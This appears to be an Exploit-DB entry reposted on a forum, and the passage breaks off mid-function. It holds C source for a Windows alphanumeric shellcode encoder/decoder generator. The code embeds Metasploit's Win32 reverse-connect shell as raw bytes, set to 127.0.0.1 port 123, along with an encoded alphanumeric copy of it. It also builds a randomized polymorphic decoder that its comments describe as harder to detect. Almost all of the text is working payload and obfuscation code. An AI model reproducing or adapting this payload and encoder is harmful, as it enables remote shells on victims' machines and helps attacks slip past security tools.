Exploit Windows - Reverse (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13286
Проверка EDB
  1. Пройдено
Автор
AVRI SCHNEIDER
Тип уязвимости
SHELLCODE
Платформа
GENERATOR
CVE
N/A
Дата публикации
2008-08-04
C:
/*
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
    Alphanumeric Shellcode Encoder Decoder
    Copyright © 1985-2008 Avri Schneider - Aladdin Knowledge Systems, Inc. All rights reserved.

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/gpl-3.0.html>.

     +-----------+
      WORKS CITED
     +-----------+
    +--------------------------------------------------------------------------------------------------+
    |Matt Conover, Soren Macbeth, Avri Schneider 05 October 2004                                       |
    |Encode2Alnum (polymorphic alphanumeric decoder/encoder)                                           |
    |Full-Disclosure <http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/027147.html>     |
    |                                                                                                  |
    |CLET Team. Aug. 2003                                                                              |
    |Polymorphic Shellcode Engine                                                                      |
    |Phrack <http://www.phrack.org/show.php?p=61&a=9>                                                  |
    |                                                                                                  |
    |Ionescu, Costin. 1 July 2003                                                                      |
    |Re: GetPC code (was: Shellcode from ASCII)                                                        |
    |Vuln-Dev <http://www.securityfocus.com/archive/82/327348>                                         |
    |                                                                                                  |
    |rix. Aug. 2001                                                                                    |
    |Writing ia32 alphanumeric shellcodes                                                              |
    |Phrack <http://www.phrack.org/show.php?p=57&a=15>                                                 |
    |                                                                                                  |
    |Wever, Berend-Jan. 28 Jan. 2001                                                                   |
    |Alphanumeric GetPC code                                                                           |
    |Vuln-Dev <http://www.securityfocus.com/archive/82/351528>                                         |
    |ALPHA3 <http://skypher.com/wiki/index.php?title=ALPHA3>                                           |
    +--------------------------------------------------------------------------------------------------+
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
*/
#include <time.h>
#include <stdio.h>
#include <windows.h>

#define MAX_BYTES                            0x100
#define MAX_ENCODED_SHELLCODE                2000 //this will be allocated on the stack
#define MIN_IP_STR_LEN                       7
#define MAX_IP_STR_LEN                       15

#define OFFSET_XOR_AL1_A                     15
#define OFFSET_XOR_AL1_B                     18
#define OFFSET_XOR_AL2_A                     37
#define OFFSET_XOR_AL2_B                     40
#define OFFSET_PUSH_DWORD1                   0
#define OFFSET_PUSH_DWORD2                   1
#define OFFSET_PUSH_DWORD3                   4
#define OFFSET_PUSH_DWORD4                   12
#define OFFSET_RANDOMIZED_DECODER_HEAD       14
#define SIZE_RANDOMIZED_DECODER_HEAD         16
BYTE EncodedShellcode[] = // encoded 336 bytes
        "PZhUQPTX5UQPTHHH4D0B8RYkA9YA3A9A2B90B9BhPTRWX5PTRW4r8B9ugxPqy8xO"
        "wck4WTyhlLlUjyhukHqGCixVLt4UTCBRwsV3pRod8OLMKO9FXJVTJJbJX4gsVXAt"
        "Q3ukAxFmVIw7HyBfDyNv5zXqg4PQeTxZJLm56vRjSidjSz75mHb2RL5Hl30tUmnH"
        "HtXEv7oZVdiEv1QwWijcgVk4CZn7NI3uRai32AZ7FS0Iq1cwWc5T5RlnTIiKJVmq"
        "4T4MElucobfP4vWyB0OfB34JRJ9T4zjLlbKmlk7jTicj11869F001uAdTZKNJ7wL"
        "mOv5mLlGPKFLtNI2525WhktKDO0NIlseHIuJ33xv7xGQAW55eZKXHw78zfvCI2U0"
        "9Ulw5ZZhynmxG7JZZgJAYbg1MEp5QcOv7AYkYfcHQDWVMlJnzOSh8nzg1NZZn5Px"
        "11U5INVEtvZOS1E094HqmbB6K1MfRIq7KQyNOeL7NHI1Xnwhyhy69bg2bTexGnkc"
        "CEt90vn3DaFxGaFuRIPg0NK40kdg0L9ImaFbGy1Wl7JyGeJByHdfRCSYzvCzVa2v"
        "RtQWG5lxRMN1CZREvyKFvfwij3X2P81J1wk9ZLmGAqxGPuQv7RBX411iaWKCLGnD"
        "kwRZKREaRis5V7c5ILxKfAx6MbH40T53PnX9ZwSWtYzbHwCzkS0Ev5iVmLmS3xSk"
        "1telLPYuGyNvX1TyJ3yLdOwckr";

// example: make encoder choose more uppercase bytes...
#define ADDITIONAL_CHARSET                   "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

#define ALNUM_CHARSET    ADDITIONAL_CHARSET  "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" // <--- allowed charset
                                                                                                              //      feel free to
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////change - YMMV
#define REGISTER_WITH_ADDRESS_OF_SHELLCODE   esp // <--- change this to the register holding the address of the decoder////////////
#define _Q(str) #str
#define Q(str) _Q(str)           
#define P(str) #str ##" // <--- buffer offset\n"## _Q(str)
///////////////////////////////////
#define CONNECT_BACK_SHELLCODE   //
//#undef  CONNECT_BACK_SHELLCODE //undefine CONNECT_BACK_SHELLCODE to use your own - and place it in shellcode[] >-----------------.
                                 ///////////////////////////////////////////////////////////////////                               |
int main();                                                                                       //                               |
UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length); //                               |
UCHAR get_push_register_instruction(UCHAR *reg);                                                  //                               |
UCHAR get_random_alnum_value();                                                                   //                               |
UCHAR get_random_alnum_push_dword_opcode();                                                       //                               |
UCHAR *get_nop_slide(UINT size, UINT slide);                                                      ///////                          |
UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);//                          |
UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);   //                          |
UCHAR *shuffle(UCHAR str[], UINT length);                                                         ///////                          |
DWORD my_htonl(DWORD dw_in);                                                                      //                               |
DWORD ip_str_to_dw(UCHAR *str);                                                                   //                               |
BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key);                       //                               |
BOOL is_alnum(UCHAR c);                                                                           //                               |
BOOL str_is_alnum(UCHAR *str);                                                                    //                               |
UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index);                  //                               |
UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1);  //                               |
struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c);                            //                               |
struct xor2_key *choose_random_node(struct xor2_key *head);                                       //                               |
void free_p_xor2_key(struct xor2_key *node);                                                      //                               |
                                                                                                  //                               |
struct xor2_key {                                                                                 //                               |
    UCHAR xor2;                                                                                   //                               |
    UCHAR key;                                                                                    //                               |
    struct xor2_key *prev;                                                                        //                               |
    struct xor2_key *next;                                                                        //                               |
} xor2_key;                                                                                       //                               |
                                                                                                  //                               |
                                                                                                  //                               |
//  Title:      Win32 Reverse Connect                                                             //                               |
//  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003                            //                               |
//  Author:     hdm[at]metasploit.com                                                             //                               |
#ifdef CONNECT_BACK_SHELLCODE                                                                     //                               |
    #define OFFSET_IP_ADDRESS                    154                                              //                               |
    #define OFFSET_TCP_PORT_NUMBER               159                                              //                               |
    #define IP_ADDRESS                           "127.0.0.1"                                      //                               |
    #define TCP_PORT_NUMBER                      123                                              //                               |
    DWORD ip_address;                                                                             //                               |
    UCHAR shellcode[] =                                                                           //                               |
                    "\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa"            //                               |
                    "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2"            //                               |
                    "\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e"            //                               |
                    "\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64"            //                               |
                    "\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57"            //                               |
                    "\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a"            //                               |
                    "\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8"            //                               |
                    "\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90"            //                               |
                    "\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57"            //                               |
                    "\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68"                                    //                               |
                    "IPIP" // I.P. address                                                        //                               |
                    "\x68"                                                                        //                               |
                    "PORT" // TCP port number                                                     //                               |
                    "\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44\x8d\x3c\x24"            //                               |
                    "\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d"            //                               |
                    "\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10"            //                               |
                    "\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00\x51\xff\x55"            //                               |
                    "\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24\x57\xff\x55"            //                               |
                    "\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b"            //                               |
                    "\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49"            //                               |
                    "\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1"            //                               |
                    "\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01"            //                               |
                    "\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb"            //                               |
                    "\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";                           //                               |
#else                                                         //////////////////////////////////////                               |
    UCHAR shellcode[] = "\xCC YOUR SHELLCODE GOES HERE \xCC"; // <----------------- here ------------------------------------------'
#endif                                                        //
DWORD size = sizeof(shellcode)-1;                             //
                                                              //
int main() {                                                  /////////////////////////////////////////////////////////
    //(decoder address is in ecx when decoder starts)                                                                //
    UCHAR PUSH_REGISTER_WITH_DECODER_ADDRESS = get_push_register_instruction(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)); // >----------.
//                                                                                                                   //            |
#define END_OF_ENCODED_SHELLCODE    'A','L','D','N' // this is the terminating string of the encoded shellcode       //            |
    UCHAR str_end_of_encoded_shellcode[]= {END_OF_ENCODED_SHELLCODE};  ////////////////////////////////////////////////            |
    UCHAR xor_al1                       = get_random_alnum_value();    // this is used to zero out AL the first time               |
    UCHAR xor_al2                       = get_random_alnum_value();    // this is used to zero out AL the second time              |
    int offset_imul_key                 = '\xC1';////////////////////////                                                          |
    int jne_xor1                        = '\xC2';//                 >---------------------------------------------------------.    |
    int jne_xor2                        = '\xC3';//            >--------------------------------------------------------------|    |
                                                 // you would need to play with these two values if you want to reduce        |    |
                                                 // the size of the NOP slides - they obviously need to stay alnum.           |    |
                                                 // You could also play with the value of AL before the XOR is done           |    |
                                                 // to get your desired negative offset. keep in mind that it will cost       |    |
                                                 // you instructions to get al to the value you want (if you use xor of       |    |
                                                 // two alphanumeric bytes, you would need to push first alphanumeric         |    |
                                                 // char to the stack, pop eax, then xor it with it's alnum complement)       |    |
                                                 // This playing around would result in an even harder to detect decoder      |    |
                                                 // as the offsets would be different                                         |    |
    int size_decoder                    ='\xC4'; //                                                                           |    |
    int half_size_decoder               ='\xC5'; ////////////////////////////////////////////////////////////////////         |    |
    UCHAR imul_instruction_1            ='\x6B';                                                                   //         |    |
    UCHAR imul_instruction_2            ='\x41';                                                                   //         |    |
    UCHAR imul_instruction_3            ='\xC6'; //size of decoder+1                                               //         |    |
    UCHAR imul_instruction_4            ='\xC7'; //initial key (random alnum)                                      //         |    |
    //                                                                                                             //         |    |
    UINT column=0, i=0;                                                               ///////////////////////////////         |    |
    UCHAR *alnum = ALNUM_CHARSET;                                                     //                                      |    |
    UCHAR *p_alnum = alnum;                                                           //                                      |    |
    UCHAR decoder[] =                                                                 //                                      |    |
    {   ////////////////////////////////////////////////////////////////////////////////                                      |    |
        //                                                                                                                    |    |
        //[step_1] -- multiply first encoded byte with key                                                                    |    |
        //[step_2] -- xor result of step_1 with second encoded byte to get the decoded byte                                   |    |
        //                                                                                                                    |    |
        // Each binary byte is encoded into three alphanumeric bytes.                                                         |    |
        // The first byte multipled by the third byte xor'ed against the second byte yeilds the original                      |    |
        // binary byte.                                                                                                       |    |
        //                                                                                                                    |    |
        // TODO:                                                                                                              |    |
        //    .--(first byte  ^ second byte) * third byte                                                                     |    |
        //    '--(second byte ^  first byte) * third byte                                                                     |    |
        //                                                                                                                    |    |
        //    .--(first byte  ^  third byte) * second byte                                                                    |    |
        //    '--(third byte  ^  first byte) * second byte                                                                    |    |
        //                                                                                                                    |    |
        //    .--(second byte ^  third byte) * first byte                                                                     |    |
        //    '--(third byte  ^ second byte) * first byte                                                                     |    |
        //                                                                                                                    |    |
        //    .--(first byte  * second byte) ^ third byte                                                                     |    |
        //    '--(second byte *  first byte) ^ third byte                                                                     |    |
        //                                                                                                                    |    |
        //    .--(first byte  *  third byte) ^ second byte <-- decoder/encoder implemented                                    |    |
        //    '--(third byte  *  first byte) ^ second byte <-- decoder implemented (same encoder)                             |    |
        //                                                                                                                    |    |
        //    .--(second byte *  third byte) ^ first byte                                                                     |    |
        //    '--(third byte  * second byte) ^ first byte                                                                     |    |
        //                                                                                                                    |    |
        //                                                                                                                    |    |
        // The above is divided into pairs, each pair has the same values (in parenthesis) just at different offsets,         |    |
        // and we can switch them around with no effect. Each option requires a different decoder, but each pair can use the  |    |
        // same encoder.                                                                                                      |    |
        //                                                                                                                    |    |
            /////////// DECODER HEAD (will be randomized by sliding instructions) //////// >----------------------------------|----|---.
   /* 1*/   '\x50',                                   //push ???  (this can change)     // [eax = address of decoder]------+  |    |   |
   /* 2*/   '\x50',                                   //push ???  (this can change)     // [ecx = address of decoder]------+  |    |   |
   /* 3*/   PUSH_REGISTER_WITH_DECODER_ADDRESS,       //push reg  (decoder address)     // [edx = address of decoder]------+  |    |   |
   /* 4*/   PUSH_REGISTER_WITH_DECODER_ADDRESS,       //push reg  (base offset for cmp) // [ebx = address of decoder]------+  |    |   |
   /* 5*/   '\x50',                                   //push ???  (this can change)     // [esp = address of decoder]------+  |    |   |
   /* 7*/   '\x6A', half_size_decoder,                //push 35h  (word offset for cmp) // [ebp = decoder size / 2]--------+  |    |   |
   /*12*/   '\x68', END_OF_ENCODED_SHELLCODE,         //push END_OF_ENCODED_SHELLCODE   // [esi = 4 bytes terminating key]>+  |    |   |
   /*13*/   '\x50',                                   //push ???  (this can change)     // [edi = address of decoder]------+  |    |   |
   /*14*/   '\x61',                                   //popad                           // [set all registers] <-----------'  |    |   |
   /*16*/   '\x6A', xor_al1, //last decoder byte=0xB1 //push XOR_AL1    [JNE_XOR1^0xFF=al^JNE_XOR2=last byte==0xB1] >----.    |    |   |
   /*17*/   '\x58',                                   //pop  eax       <-------------------------------------------------'    |    |   |
   /*19*/   '\x34', xor_al1,                          //xor  al,XOR_AL1        [al = 0x00]                                    |    |   |
   /*20*/   '\x48',                                   //dec  eax               [al = 0xFF] [you can play with AL here...]<----'    |   |
   /*22*/   '\x34', jne_xor1,                         //xor  al,JNE_XOR1            [al = 0xFF ^ JNE_XOR1]                         |   |
   /*25*/   '\x30', '\x42', size_decoder-1,           //xor  byte ptr [edx+size],al >--change-last-byte--.                         |   |
   /*26*/   '\x52',                                   //push edx     [save decoder address on stack]     |                         |   |
   /*27*/   '\x52',                                   //push edx     >----.                              |                         |   |
   /*28*/   '\x59',                                   //pop  ecx   <------'  [ecx = address of decoder]  |                         |   |
   /*29*/   '\x47',                                   //inc edi    we increment ebx keeping the decoder  |                         |   |
   /*30*/   '\x43',                                   //inc ebx    length non-even (edi is unused)       |                         |   |
            //////////////// DECODER_LOOP_START ///////////////////////////////////////////              |                         |   |
   /*31*/   '\x58',      //get address of the decoder //pop  eax                          <---------. <--|-----------------.       |   |
   /*32*/   '\x52',      //save edx                   //push edx   [can use edx now]>---------------|----|---------------. |       |   |
   /*33*/   '\x51',      //save ecx                   //push ecx   [can use ecx now]   >------------|----|-------------. | |       |   |
   /*34*/   '\x50',      //save address of decoder    //push eax   [can use eax now]      >---------|----|-----------. | | |       |   |
   /*35*/   '\x50',      //save eax                   //push eax   >----.                           |    |           | | | |       |   |
   /*36*/   '\x5A',      //restore into edx           //pop  edx <------'                           |    |           | | | |       |   |
   /*38*/   '\x6A', xor_al2, //zero out al            //push XOR_AL2    [al = 0] >----.             |    |           | | | |       |   |
   /*39*/   '\x58',          //zero out al            //pop  eax                      |             |    |           | | | |       |   |
   /*41*/   '\x34', xor_al2, //zero out al            //xor  al,XOR_AL2    <----------'             |    |           | | | |       |   |
   /*42*/   '\x50',      //save al on the stack (al=0)//push eax            >-----------------.     |    |           | | | |       |   |
   /*45*/   '\x32', '\x42', offset_imul_key,          //xor  al,byte ptr [edx+off]            |     |    |           | | | |       |   |
   /*48*/   '\x30', '\x42', offset_imul_key,          //xor  byte ptr [edx+off],al >--this-zero's-the-key----.       | | | |       |   |
   /*49*/   '\x58', //restore al from the stack (al=0)//pop  eax       <----------------------'     |    |   |       | | | |       |   |
   /*52*/   '\x32', '\x41', size_decoder+2, // get key in al  //xor  al,byte ptr [ecx+size+2]       |    |   |       | | | |       |   |
   /*55*/   '\x30', '\x42', offset_imul_key,          //xor  byte ptr [edx+off],al >---this-changes-the-key--|----.  | | | |       |   |
   /*56*/   '\x58',      //restore address of decoder //pop  eax  <---------------------------------|----|---|----|--' | | |       |   |
   /*57*/   '\x59',      //restore ecx [word offset]  //pop  ecx     <------------------------------|----|---|----|----' | |       |   |
   /*58*/   '\x5A',      //restore edx [byte offset]  //pop  edx        <---------------------------|----|---|----|------' |       |   |
   /*59*/   '\x50',      //save address of decoder    //push eax  >---------------------------------|----|---|----|--------'       |   |
            /////////// START NOP_SLIDE_1 /////////////////////////////////////////////////         |    |   |    |                |   |
   /*60*/   '\x41',/////////////////////////////////////inc  ecx///////////////////////////         |    |   |    |                |   |
   /*61*/   '\x49',/////////////////////////////////////dec  ecx///////////////////////////         |    |   |    |                |   |
   /*62*/   '\x41',/////////////////////////////////////inc  ecx///////////////////////////         |    |   |    |                |   |
   /*63*/   '\x49',/////////////////////////////////////dec  ecx+-----------------------+//         |    |   |    |                |   |
   /*64*/   '\x41',//     IMUL can go here and bellow //inc  ecx|                       |//         |    |   |    |                |   |
   /*65*/   '\x49',//                                 //dec  ecx|   16 bytes            |//         |    |   |    |                |   |
   /*66*/   '\x41',//                                 //inc  ecx|   NOP slide           |//         |    |   |    |                |   |
   /*67*/   '\x49',//                                 //dec  ecx|                       |//         |    |   |    |                |   |
   /*68*/   '\x41',//                                 //inc  ebx| can mungle eax until  |//         |    |   |    |                |   |
   /*69*/   '\x49',//       will be randomized        //dec  ebx| IMUL_INSTRUCTION      |//         |    |   |    |                |   |
   /*70*/   '\x41',//                                 //inc  edx|                       |//         |    |   |    |                |   |
   /*71*/   '\x49',//                                 //dec  edx|                       |//         |    |   |    |                |   |
   /*72*/   '\x41',//                                 //inc  esi|                       |//         |    |   |    |                |   |
   /*73*/   '\x49',//                                 //dec  esi+-----------------------+//         |    |   |    |                |   |
   /*74*/   '\x41',//                                 //push eax///////////////////////////         |    |   |    |                |   |
   /*75*/   '\x49',//                                 //pop  eax//////////////////////// //         |    |   |    |                |   |
            //////////// END NOP_SLIDE_1 //////////////////////////////////////////////////         |    |   |    |                |   |
            //                                                                                      |    |   |    |                |   |
            // We can move around the IMUL_INSTRUCTION inside the NOP slides - but not before       |    |   |    |                |   |
            // MAX_OFFSET_OFFSET_IMUL i.e. we can't move it before the first 4 bytes of NOP_SLIDE_1 |    |   |    |                |   |
            // or the offset will not be alphanumeric.                                              |    |   |    |                |   |
            //                                                                                      |    |   |    |                |   |
            // We need to move the IMUL_INSTRUCTION in two byte increments, as we may modify eax in |    |   |    |                |   |
            // NOP_SLIDE_1 and we can't change eax after the IMUL_INSTRUCTION (as the result goes   |    |   |    |                |   |
            // into eax) - this limitation can be overcome if we make sure not to modify eax after  |    |   |    |                |   |
            // the IMUL_INSTRUCTION - and it is easy enough, as we don't care about eax' value at   |    |   |    |                |   |
            // all - so we don't need to restore it. We can simply increment or decrement an unused |    |   |    |                |   |
            // register instead. We happen to have such a register - edi =]                         |    |   |    |                |   |
            //                                                                                      |    |   |    |                |   |
            // So in NOP_SLIDE_1, we can't use push eax;pop eax unless they will not be split by    |    |   |    |                |   |
            // the IMUL_INSTRUCTION - because we would need the value of eax after the imul, and    |    |   |    |                |   |
            // the pop eax would overwrite it                                                       |    |   |    |                |   |
            //                                                                                      |    |   |    |                |   |
            // But we could use a dec eax;inc edi or a dec eax;dec edi combinations (inc eax is not |    |   |    |                |   |
            // alphanumeric.).                                                                      |    |   |    |                |   |
            //                                                                                      |    |   |    |                |   |
            // -OBSOLETE-                                                                           |    |   |    |                |   |
            // I have set here the IMUL_INSTRUCTION between NOP_SLIDE_1 and NOP_SLIDE_2             |    |   |    |                |   |
            // If you wish to move it up, you will need to move it up by an even number of bytes.   |    |   |    |                |   |
            // You will then need to change OFFSET_OFFSET_IMUL accordingly                          |    |   |    |                |   |
            // (add the number of bytes to it)                                                      |    |   |    |                |   |
            // If you wish to move it down, you will need to move it down by an even number of      |    |   |    |                |   |
            // bytes.                                                                               |    |   |    |                |   |
            // You will then need to change OFFSET_OFFSET_IMUL accordingly                          |    |   |    |                |   |
            // (deduct the number of bytes from it)                                                 |    |   |    |                |   |
            //                                                                                      |    |   |    |                |   |
            // TODO: make a routine that moves it around randomally between allowed values          |    |   |    |                |   |
            // and sets the proper offsets                                                          |    |   |    |                |   |
            // this routine should be called after the NOP slides have been randomized.             |    |   |    |                |   |
            //                                                                                      |    |   |    |                |   |
            ////////// START NOP_SLIDE_2 ////////////////////////////////////////////////////       |    |   |    |                |   |
   /*76*/   '\x41',//                                   //inc  ecx///////////////////////////       |    |   |    |                |   |
   /*77*/   '\x49',//                                   //dec  ecx///////////////////////////       |    |   |    |                |   |
   /*78*/   '\x41',//                                   //inc  ebx///////////////////////////       |    |   |    |                |   |
   /*79*/   '\x49',//                                   //dec  ebx+-----------------------+//       |    |   |    |                |   |
   /*80*/   '\x41',//      will be randomized           //inc  edx|                       |//       |    |   |    |                |   |
   /*81*/   '\x49',//                                   //dec  edx|   12 bytes            |//       |    |   |    |                |   |
   /*82*/   '\x41',//                                   //inc  esi|   NOP slide           |//       |    |   |    |                |   |
   /*83*/   '\x49',//                                   //dec  esi|                       |//       |    |   |    |                |   |
   /*84*/   '\x41',//                                   //push eax|                       |//       |    |   |    |                |   |
   /*85*/   '\x49',//                                   //pop  eax|                       |//       |    |   |    |                |   |
   /*86*/   '\x41',//                                   //inc  ecx+-----------------------+//       |    |   |    |                |   |
   /*87*/   '\x49',//                                   //dec  ecx///////////////////////////       |    |   |    |                |   |
            //           IMUL can go down to here                                                   |    |   |    |                |   |
            /////////           [step_1]   //imul eax,dword ptr [ecx+size_decoder+1],45h            |    |   |    |                |   |
   /*91*/imul_instruction_1, imul_instruction_2, imul_instruction_3, imul_instruction_4,// <-This-key-will-change-'                |   |
            ////////// END NOP_SLIDE_2////////////////////////////////////////////////////          |    |                         |   |
   /*92 */  '\x41',      //ecx incremented once       //inc  ecx  ---------------------.            |    |                         |   |
   /*95 */  '\x33', '\x41', size_decoder,   //[step_2]//xor  eax,dword ptr [ecx+size]  | <--------------------store decoded        |   |
   /*98 */  '\x32', '\x42', size_decoder,             //xor  al,byte ptr [edx+size]    |ecx = ecx+2 |    |    byte                 |   |
   /*101*/  '\x30', '\x42', size_decoder,             //xor  byte ptr [edx+size],al    |            |    |(eax=result of IMUL)     |   |
   /*102*/  '\x41',      //ecx incremented twice      //inc  ecx  ---------------------'            |    |                         |   |
   /*103*/  '\x42',      //edx incremented once       //inc  edx                        edx = edx+1 |    |                         |   |
   /*104*/  '\x45',      //ebp incremented once       //inc  ebp                                    |    |                         |   |
   /*107*/  '\x39', '\x34', '\x6B',         //cmp  dword ptr [ebx+ebp*2],esi // check if we reached the end                        |   |
   /*109*/  '\x75', jne_xor2,               // <===0xB1   //jne  DECODER_LOOP_START  >--------------' <--'                         |   |
            '\x00' // If you change the length of the decoder, the jne would need to jump to a different offset than 0xB1          |   |
    };//////////////////////////////////////////////////                                                                           |   |
    UINT shrink;                                      //                                                                           |   |
    UCHAR *found_msg;                                 //                                                                           |   |
    UCHAR *p_decoder = decoder;                       //                                                                           |   |
    UCHAR xor1, xor2, key;                            //                                                                           |   |
    UCHAR temp_buf[3] = "";                           //                                                                           |   |
    UCHAR alnum_shellcode[MAX_ENCODED_SHELLCODE] = "";//                                                                           |   |
    UCHAR *p_alnum_shellcode = alnum_shellcode;       //                 todo: allow for the key to be either the first,           |   |
    struct xor2_key *p_xor2_key = 0;                  //                       the second or the third byte (currently third).     |   |
    UCHAR *p_shellcode = shellcode;                   //                                                                           |   |
    void *_eip = 0;                                   //                                                                           |   |
                                                      //                                                                           |   |
    int offset_nop_slide1;                            //                                                                           |   |
    int offset_nop_slide2;                            //                                                                           |   |
    int offset_half_size_decoder;                     //                                                                           |   |
    int offset_terminating_key;                       //                                                                           |   |
    int offset_imul_instruction1;                     //                                                                           |   |
    int offset_imul_instruction2;                     //                                                                           |   |
    int offset_imul_instruction3;                     //                                                                           |   |
    int offset_imul_instruction4;                     //                                                                           |   |
    int negative_offset_size_decoder1;                //                                                                           |   |
    int negative_offset_size_decoder2;                //                                                                           |   |
    int negative_offset_size_decoder3;                //                                                                           |   |
    int offset_size_decoder_min_1;                    //                                                                           |   |
    int offset_size_decoder_pls_2;                    //                                                                           |   |
    int offset_imul_key_offset1;                      //                                                                           |   |
    int offset_imul_key_offset2;                      //                                                                           |   |
    int offset_imul_key_offset3;                      //                                                                           |   |
    int offset_imul_instruction;                      //                                                                           |   |
    int size_nop_slide1;                              //                                                                           |   |
    int size_nop_slide2;                              //                                                                           |   |
    int offset_jne_xor1;                              //                                                                           |   |
    int offset_jne_xor2;                              //                                                                           |   |
    int decoder_length_section1;                      //                                                                           |   |
    int decoder_length_section2;                      //                                                                           |   |
    int decoder_length_section3;                      //                                                                           |   |
    int imul_instruction_length;                      //                                                                           |   |
    int jne_xor_negative_offset;                      //                                                                           |   |
    int backward_slide_offset;                        //                                                                           |   |
    BOOL decoder_version_1;                           //                                                                           |   |
    UINT srand_value;                                 //                                                                           |   |
#ifdef CONNECT_BACK_SHELLCODE                         /////////////////////////////////////////////                                |   |
    printf("scanning EncodedShellcode for shellcode up to OFFSET_IP_ADDRESS bytes\n");           //                                |   |
    found_msg = scan_str_known_pattern(EncodedShellcode, shellcode, OFFSET_IP_ADDRESS);          //                                |   |
    if (found_msg) printf("shellcode found encoded in EncodedShellcode using %s.\n", found_msg); //                                |   |
    else printf("shellcode not found encoded in EncodedShellcode.\n");/////////////////////////////                                |   |
#endif                                                //////////////////                                                           |   |
    printf("shellcode length:%d\n", size);            //                                                                           |   |
    srand_value = time(NULL);                         //                                                                           |   |
//  srand_value =           ;                         // for debugging                                                             |   |
    srand(srand_value);                               //                                                                           |   |
    printf("srand value=%d\n", srand_value);          //                                                                           |   |
    decoder_version_1 = rand() % 2;                   //                                                                           |   |
                                                      /////                                                                        |   |
    size_decoder                       = strlen(decoder);//                                                                        |   |
    decoder_length_section1            = 30; //////////////                                                                        |   |
    decoder_length_section2            = 29; //                                                                                    |   |
    decoder_length_section3            = 18; //                                                                                    |   |
                                             //                                                                                    |   |
    size_nop_slide1                    = 28; //                                                                                    |   |
    size_nop_slide2                    = 0;  //                                                                                    |   |
                                             //                                                                                    |   |
    imul_instruction_length            = 4;  //                                                                                    |   |
                                             //                                                                                    |   |
    shrink = (rand()%6)*2;                   //////////////////////////////////////////////////// (can shrink up to 10 bytes       |   |
    memmove(decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1-shrink,    //  in 2 byte increments)           |   |
            decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1,           //                                  |   |
                      imul_instruction_length+size_nop_slide2+decoder_length_section3+1);      //                                  |   |
    size_decoder -=shrink;                ///////////////////////////////////////////////////////                                  |   |
    half_size_decoder = size_decoder/2;   //                                                                                       |   |
    size_nop_slide1 -=shrink;             /////////////////////////                                                                |   |
    printf("shrinking decoder by: %d\n", shrink);                //                                                                |   |
                                                                 //                                                                |   |
    offset_imul_instruction            = decoder_length_section1+//                                                                |   |
                                         decoder_length_section2+//                                                                |   |
                                         size_nop_slide1;//////////                                                                |   |
                                                         //                                                                        |   |
    backward_slide_offset = rand() % 15;                 //    (selects a number from 0 to 14 in increments of 1)                  |   |
    strncpy(decoder,                                     //                                                                        |   |
            slide_substr_back(decoder,                   //                                                                        |   |
                              offset_imul_instruction,   //                                                                        |   |
                              imul_instruction_length,   //                                                                        |   |
                              size_decoder,           /////                                                                        |   |
                              backward_slide_offset), //                                                                           |   |
